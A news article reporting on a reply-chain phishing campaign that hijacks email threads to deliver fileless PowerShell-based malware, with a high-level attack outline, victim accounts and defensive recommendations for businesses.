Email Under Attack: New Fileless Malware Campaign Targets Trusted Threads

Cybercriminals are using fileless malware embedded in email chains to bypass security systems, compromising businesses and individuals across multiple sectors.

“Reply Chain” Malware Attacks Infiltrate Email Systems, Trigger Global Cybersecurity Alarm

By an International Cybersecurity Correspondent

In a digital era where email remains the backbone of global communication, a new malware campaign is exploiting the very trust that fuels it. Cybercriminals are hijacking legitimate email conversations to deliver fileless malware, evading traditional security measures and compromising users across sectors from finance to education.

The latest analysis by cybersecurity firm ESET, reported by Infosecurity Magazine, reveals that this attack vector—known as a reply-chain phishing attack—has been refined to embed malicious scripts within ongoing email threads, making the messages appear authentic and increasing the likelihood of user engagement.

“This malware doesn’t come in with a bang—it slips in like a whisper,” said Eliska Jedlickova, security researcher at ESET. “It weaponizes trust by mimicking authentic conversations, which makes it incredibly effective.”

How the Attack Works

Unlike traditional malware that relies on suspicious attachments or links, this campaign leverages email thread hijacking, where attackers gain access to a legitimate user’s mailbox and reply to active conversations with infected content. These messages often contain HTML or PDF attachments that trigger PowerShell scripts—all without dropping any executable files, thus bypassing most endpoint detection systems.

The malware’s fileless nature allows it to:

• Remain in memory without writing to disk
• Exploit PowerShell and WMI (Windows Management Instrumentation) for persistence
• Establish command-and-control (C2) communications to exfiltrate data

Sample attack flow:

1. Access a compromised email account
2. Reply to a real email thread with a malicious file disguised as a document or invoice
3. Launch PowerShell in memory to retrieve a secondary payload
4. Exfiltrate browser credentials, system info, and keystrokes

Human and Business Impact

The real-world consequences are mounting. Victims include small businesses, law firms, universities, and nonprofit organizations—entities that often lack the advanced detection infrastructure found in large enterprises.

In one case, a mid-sized logistics firm in Spain reported the theft of internal financial data after an employee unknowingly opened an HTML attachment from what appeared to be their supplier.

“We didn’t question the email. It was part of an ongoing chain with a partner we’ve worked with for years,” said the company’s CTO, who requested anonymity. “By the time we caught it, our entire billing system was compromised.”

Why It Matters Globally

This campaign is not just a regional threat—it’s a global wake-up call. The method’s success lies in its social engineering precision and its technical evasion capabilities. The malware is still being analyzed, but experts suggest it may be linked to financially motivated threat actors operating across Europe and Asia.

Moreover, the use of living-off-the-land binaries (LOLBins) like PowerShell and mshta.exe make the malware stealthy, making standard antivirus solutions nearly useless unless paired with behavioral analysis tools or extended detection and response (XDR) platforms.

Expert Recommendations

Cybersecurity professionals are urging businesses to:

• Implement multi-factor authentication (MFA) for all email accounts
• Train employees to recognize reply-chain manipulation
• Disable PowerShell on non-administrative endpoints
• Deploy email filtering systems with behavioral sandboxing
• Monitor outbound traffic for C2 communications and anomalies

“This is a clear reminder that cybersecurity isn’t just about firewalls—it’s about behavior, context, and training,” said Jedlickova.